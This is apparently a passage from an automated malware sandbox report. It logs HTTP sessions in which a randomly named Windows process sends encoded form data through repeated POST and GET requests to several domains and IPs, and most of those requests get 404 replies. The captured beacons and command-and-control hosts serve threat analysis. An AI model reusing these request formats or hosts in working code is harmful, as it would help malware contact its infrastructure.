                                                                                              Data Ascii: I4ET5=rNrPDBiknVqXu7iW5anTXuX6saoNL5kR2rWkr2v2eWmrLTfqllvYyFYnbosKOkQGKQ3TrryCkcJs3nw4hr84rUwbqbp+nz3MjobXpg9nZRayDnslpV2MYrHpec0FEQmKmhfGM8QC5zTPrZOUBy7DaUWDbFs+O2YTshIY267Pib+RfLFpYRNKgob8n62eJfBaw2A6AxlvvIOss5fHs4tHtXqY565VQ5Oas3HrXdmBxs6XkHy+w/xsYM+47/DenQLOixPZCltd3SR/cpRfsI4YP6QVHxA6eKXlrP1gaDNgm/fQ/s5rMXsYiHWBcfv9p2NlYxvX1kI2tx81qZlIDHqPIUNDQd6gHfCyYknMqNnt6Cc1ErNqDPNNK+dozf1JeEO6iOUE3szxyc/besJsdCL8jiZksP98UOZNGqYBPrCUeg1YW7cuv1okWwpYWQDBsQvD5Wh4exGvwA9nynbLJwfjaBD6+xvw1TFujmxPW+lWOx73s7ZtEAa6lgM3Qp6tehOyqXJnaqSSQzGNdXRG8chq6V0r43q7cNn4g7SOGnL6MrCjt8xnZIeQzB4aSfjURr3yZ8BYORugimlSf7ANzStW4VGJOljGuFJx5cH2PHQcsDmqe0YQtm8Kh4GVVkoCFILDpg2cxNKkXonl+2Dw9dcRXWlVzJvslkesRZk7VTmh7fpwXBVyufH3k07+AUp9/AvUqFtrqs9NbO7Rb5Gk9aM7/JxvlRER68inTDqZtJWjYihm5ldtkTMHGwSP2V0Y4WP760dvR5ym1iZWce7wAasrgk+yYYrQnfCqqLMufCFLARCAnvpqdePohOaeRAq5Di0cocnpoYseTgLvfPl6QDHdkljeXyA9nS/zROkoLUaqI8929VRCB4UrV0tV4cfmrCJR8QYoe8/HFjUvfECvfB/C9eKURd21Ygu4pyA4GCPDKSqdI4vATfgWErQVrU4IxSbmERK/bu6EvOjTRBgOmMMd2rBS91Tbk/3B9vvyBnFx5/g9gu [TRUNCATED]
                                                                                              Oct 8, 2024 15:54:37.140346050 CEST595INHTTP/1.1 404 Not Found
                                                                                              Date: Tue, 08 Oct 2024 13:54:37 GMT
                                                                                              Server: Apache
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Content-Length: 389
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              Connection: close
                                                                                              Content-Type: text/html
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              20192.168.2.65000763.250.47.40802356C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 8, 2024 15:54:39.099855900 CEST563OUTGET /3bdq/?I4ET5=mPDvA1qI3GiuntP+47r7UbinyaAdWbB61+amzFfuWlPCagi05gb63n03Sa0iFCs5HVPasI6LuL9f8nEGr4Exv0kyrqFFpmLMz7jnyzN+XheUDXt53FO2cfXJKOJNKmSe0FPHbZU=&5xn03=7vMx2HlPWl HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Host: www.kexweb.top
                                                                                              Connection: close
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                              Oct 8, 2024 15:54:39.777832031 CEST610INHTTP/1.1 404 Not Found
                                                                                              Date: Tue, 08 Oct 2024 13:54:39 GMT
                                                                                              Server: Apache
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Content-Length: 389
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              Connection: close
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              21192.168.2.65000891.184.0.200802356C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 8, 2024 15:54:44.842623949 CEST838OUTPOST /ikh0/ HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Host: www.jobworklanka.online
                                                                                              Origin: http://www.jobworklanka.online
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 210
                                                                                              Connection: close
                                                                                              Cache-Control: max-age=0
                                                                                              Referer: http://www.jobworklanka.online/ikh0/
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                              Data Raw: 49 34 45 54 35 3d 6f 74 5a 63 79 65 48 58 52 73 55 61 6b 63 74 66 75 64 76 48 48 58 71 6c 57 47 2f 36 79 52 51 68 64 31 72 4c 32 54 43 2f 47 6a 49 6f 75 77 6e 30 42 37 36 65 65 6f 4f 64 61 35 6e 6c 47 55 39 6b 4d 33 69 4b 44 57 6a 61 49 70 48 63 30 44 79 41 4d 51 57 71 68 4c 6d 6d 4f 6f 4e 6f 6f 67 59 72 64 6a 77 74 51 35 6e 34 62 48 4c 70 71 39 77 48 74 69 68 6c 38 72 6c 78 35 52 63 49 4e 31 4f 33 31 68 69 62 31 6c 44 30 64 48 36 49 63 4f 2b 31 49 63 65 78 49 32 52 51 37 5a 57 54 48 32 50 75 42 56 66 51 69 49 51 79 50 41 53 69 2f 4f 4d 50 63 76 32 66 76 54 45 76 43 47 33 30 6b 68 33 52 4c 34 48 78 49 43 42 30 4d 38 38 30
                                                                                              Data Ascii: I4ET5=otZcyeHXRsUakctfudvHHXqlWG/6yRQhd1rL2TC/GjIouwn0B76eeoOda5nlGU9kM3iKDWjaIpHc0DyAMQWqhLmmOoNoogYrdjwtQ5n4bHLpq9wHtihl8rlx5RcIN1O31hib1lD0dH6IcO+1IcexI2RQ7ZWTH2PuBVfQiIQyPASi/OMPcv2fvTEvCG30kh3RL4HxICB0M880
                                                                                              Oct 8, 2024 15:54:45.463727951 CEST500INHTTP/1.1 404 Not Found
                                                                                              Date: Tue, 08 Oct 2024 13:54:45 GMT
                                                                                              Server: Apache
                                                                                              X-Xss-Protection: 1; mode=block
                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Content-Length: 196
                                                                                              Connection: close
                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              22192.168.2.65000991.184.0.200802356C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 8, 2024 15:54:47.388355017 CEST862OUTPOST /ikh0/ HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Host: www.jobworklanka.online
                                                                                              Origin: http://www.jobworklanka.online
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 234
                                                                                              Connection: close
                                                                                              Cache-Control: max-age=0
                                                                                              Referer: http://www.jobworklanka.online/ikh0/
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                              Data Raw: 49 34 45 54 35 3d 6f 74 5a 63 79 65 48 58 52 73 55 61 6b 39 64 66 74 38 76 48 41 33 71 6b 4b 57 2f 36 39 78 51 6c 64 31 6e 4c 32 52 75 76 47 57 67 6f 76 52 58 30 41 36 36 65 54 49 4f 64 51 5a 6e 67 4c 30 39 37 4d 33 75 43 44 58 50 61 49 70 6a 63 30 44 43 41 4e 6e 69 70 6e 62 6d 6f 56 34 4e 51 6c 41 59 72 64 6a 77 74 51 35 79 6a 62 47 76 70 72 4e 41 48 76 48 4e 6b 32 4c 6c 77 70 78 63 49 66 46 4f 7a 31 68 6a 38 31 6b 65 54 64 42 32 49 63 4d 6d 31 49 4a 72 6e 44 32 51 36 31 35 58 5a 45 6d 72 2b 50 6b 32 72 68 37 41 4b 51 78 75 30 33 59 4e 56 41 63 32 38 39 44 6b 74 43 45 76 47 6b 42 33 37 4a 34 2f 78 61 56 4e 54 44 49 5a 58 47 74 2b 5a 44 42 56 79 45 6d 66 35 41 34 4c 50 33 73 42 65 71 41 3d 3d
                                                                                              Data Ascii: I4ET5=otZcyeHXRsUak9dft8vHA3qkKW/69xQld1nL2RuvGWgovRX0A66eTIOdQZngL097M3uCDXPaIpjc0DCANnipnbmoV4NQlAYrdjwtQ5yjbGvprNAHvHNk2LlwpxcIfFOz1hj81keTdB2IcMm1IJrnD2Q615XZEmr+Pk2rh7AKQxu03YNVAc289DktCEvGkB37J4/xaVNTDIZXGt+ZDBVyEmf5A4LP3sBeqA==
                                                                                              Oct 8, 2024 15:54:47.997174025 CEST500INHTTP/1.1 404 Not Found
                                                                                              Date: Tue, 08 Oct 2024 13:54:47 GMT
                                                                                              Server: Apache
                                                                                              X-Xss-Protection: 1; mode=block
                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Content-Length: 196
                                                                                              Connection: close
                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              23192.168.2.65001091.184.0.200802356C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 8, 2024 15:54:50.095005035 CEST1875OUTPOST /ikh0/ HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Host: www.jobworklanka.online
                                                                                              Origin: http://www.jobworklanka.online
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 1246
                                                                                              Connection: close
                                                                                              Cache-Control: max-age=0
                                                                                              Referer: http://www.jobworklanka.online/ikh0/
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                              Data Raw: 49 34 45 54 35 3d 6f 74 5a 63 79 65 48 58 52 73 55 61 6b 39 64 66 74 38 76 48 41 33 71 6b 4b 57 2f 36 39 78 51 6c 64 31 6e 4c 32 52 75 76 47 57 34 6f 76 6a 66 30 41 5a 53 65 63 6f 4f 64 4c 5a 6e 68 4c 30 39 79 4d 7a 43 47 44 58 79 74 49 76 6e 63 79 67 36 41 45 7a 2b 70 70 62 6d 6f 63 59 4e 72 6f 67 59 2b 64 6a 41 70 51 35 69 6a 62 47 76 70 72 4f 59 48 6d 79 68 6b 77 4c 6c 78 35 52 63 45 4e 31 4f 58 31 6c 48 47 31 6b 61 70 63 78 57 49 62 73 32 31 45 62 44 6e 42 57 52 63 32 35 57 4d 45 6d 57 35 50 6b 36 64 68 36 45 67 51 79 79 30 30 76 49 7a 46 75 2b 56 6b 31 77 53 61 55 58 63 6b 45 36 51 4e 49 4f 50 52 57 4a 4a 49 38 42 58 66 36 79 62 47 58 51 2b 50 46 7a 4c 45 75 75 78 32 2f 6b 52 35 69 2f 4a 52 66 77 2b 7a 44 4f 38 62 59 2b 4e 70 55 35 6a 6b 5a 54 56 69 45 32 69 36 55 72 4b 79 65 46 32 36 4a 43 4e 61 46 2b 72 78 69 51 70 67 76 63 59 45 47 38 2f 6e 46 62 50 73 46 31 67 53 36 6c 36 33 67 46 4d 58 45 75 58 64 4e 38 46 51 66 50 44 67 35 32 6c 71 47 54 76 43 4b 39 47 33 54 79 6c 47 39 67 45 78 4c 33 7a [TRUNCATED]
                                                                                              Data Ascii: I4ET5=otZcyeHXRsUak9dft8vHA3qkKW/69xQld1nL2RuvGW4ovjf0AZSecoOdLZnhL09yMzCGDXytIvncyg6AEz+ppbmocYNrogY+djApQ5ijbGvprOYHmyhkwLlx5RcEN1OX1lHG1kapcxWIbs21EbDnBWRc25WMEmW5Pk6dh6EgQyy00vIzFu+Vk1wSaUXckE6QNIOPRWJJI8BXf6ybGXQ+PFzLEuux2/kR5i/JRfw+zDO8bY+NpU5jkZTViE2i6UrKyeF26JCNaF+rxiQpgvcYEG8/nFbPsF1gS6l63gFMXEuXdN8FQfPDg52lqGTvCK9G3TylG9gExL3zvRGhydgen/piOBTYsIK93eqNT5WuHPHs8Rmo1qilId7csvVasJQFCdTcp/XReg9e+WWZGm/LaEtB38OdFDcN4kC2ow0StIQoTG02hmH3HMrsAwfHPozc9QRhdjRXsVgYGnGw4VrtgVOXvecbdnTuUAbOcIdY8cZqbUrC1EIrytG8H+cwSMfuqj3j+cJFGeR7ZQ2Jq6nF56PnGjbTCSExkpYEvxnqQjZi1AXa+edABf4XocCmqwbNFgReoN4+gtL1Nsf2LKQKwHvmuHzUcGHsWBEIrrwFuCXyknCpPCdZQ7WIGEtpwwf/old8aThlbAFxfPptRUtzvfuMbZvc7uuN8YqaMuP8VD90RYSqlCAqIzkwGbewPMLGpOUQsHY6WwLqfbFnPmNqalpbI2NZKpLUS7eGN3bprYatVmsyfM4L3CzrbEyra3DTUlJ+pUJOVswovnBS/82z5iB4XZVKJyuRx8kTiEuv2l4nKnev9G8NephV0EhDVuS7J5piQ1XlQcaIt613k/IMRgz7DlA2z9F4T2JVzvD9znA/bpEoF62hsX2w+FgXpAPId6CbONKD8vueDT+Z6OvwxazG+PKW51OqU7NSpaOpj6Rkbj6jY73r8XwPJz5G0S50itMFjbNY3ogQkI/bj4Gu9pvSxCrnFXZIuT46rgefDrnW0I [TRUNCATED]
                                                                                              Oct 8, 2024 15:54:50.680727959 CEST500INHTTP/1.1 404 Not Found
                                                                                              Date: Tue, 08 Oct 2024 13:54:50 GMT
                                                                                              Server: Apache
                                                                                              X-Xss-Protection: 1; mode=block
                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Content-Length: 196
                                                                                              Connection: close
                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              24192.168.2.65001191.184.0.200802356C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 8, 2024 15:54:52.654541969 CEST572OUTGET /ikh0/?5xn03=7vMx2HlPWl&I4ET5=lvx8xqKuEeZXr5IXmtDcOSOuXgPzygssZETVjxqXK0Zv2i3/Db6zT6O/acvvHmVSaGyiGmLaE43R+XLSCAO1uL6vU7t5jilJUCYKPYTSTWzBlftPtFsf3/wj5zdrQAyp0VL/hTg= HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Host: www.jobworklanka.online
                                                                                              Connection: close
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                              Oct 8, 2024 15:54:53.318254948 CEST500INHTTP/1.1 404 Not Found
                                                                                              Date: Tue, 08 Oct 2024 13:54:53 GMT
                                                                                              Server: Apache
                                                                                              X-Xss-Protection: 1; mode=block
                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Content-Length: 196
                                                                                              Connection: close
                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              25192.168.2.65001213.248.169.48802356C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 8, 2024 15:54:58.377140045 CEST808OUTPOST /h7lb/ HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Host: www.dyme.tech
                                                                                              Origin: http://www.dyme.tech
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 210
                                                                                              Connection: close
                                                                                              Cache-Control: max-age=0
                                                                                              Referer: http://www.dyme.tech/h7lb/
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                              Data Raw: 49 34 45 54 35 3d 63 5a 6e 6e 5a 35 6c 77 39 6d 56 6f 73 4a 53 4a 62 2f 6b 54 33 48 37 47 37 55 79 74 4a 6e 75 7a 36 55 46 63 34 37 46 54 4d 6f 44 4a 6b 73 59 58 73 48 55 58 49 77 39 50 76 56 31 67 78 38 56 52 5a 53 77 71 6d 7a 76 78 30 45 47 7a 2b 49 51 52 62 73 7a 31 61 4f 77 38 69 4b 6e 4c 74 4e 6f 61 73 77 34 4a 38 59 6d 42 39 4f 34 66 56 49 42 43 2f 30 36 6b 6f 38 2b 69 44 57 46 55 4e 44 54 49 76 4a 64 48 75 39 68 41 47 6e 56 55 6a 54 68 69 57 64 46 46 39 32 50 64 41 79 43 46 6a 63 30 4b 74 75 64 39 36 7a 2b 73 59 65 4d 64 4c 59 4f 77 69 65 35 62 37 4a 73 4a 76 42 77 69 2b 56 4a 55 70 67 54 50 53 61 41 32 73 36 7a 49
                                                                                              Data Ascii: I4ET5=cZnnZ5lw9mVosJSJb/kT3H7G7UytJnuz6UFc47FTMoDJksYXsHUXIw9PvV1gx8VRZSwqmzvx0EGz+IQRbsz1aOw8iKnLtNoasw4J8YmB9O4fVIBC/06ko8+iDWFUNDTIvJdHu9hAGnVUjThiWdFF92PdAyCFjc0Ktud96z+sYeMdLYOwie5b7JsJvBwi+VJUpgTPSaA2s6zI


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              26192.168.2.65001313.248.169.48802356C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 8, 2024 15:55:00.920562029 CEST832OUTPOST /h7lb/ HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Host: www.dyme.tech
                                                                                              Origin: http://www.dyme.tech
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 234
                                                                                              Connection: close
                                                                                              Cache-Control: max-age=0
                                                                                              Referer: http://www.dyme.tech/h7lb/
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
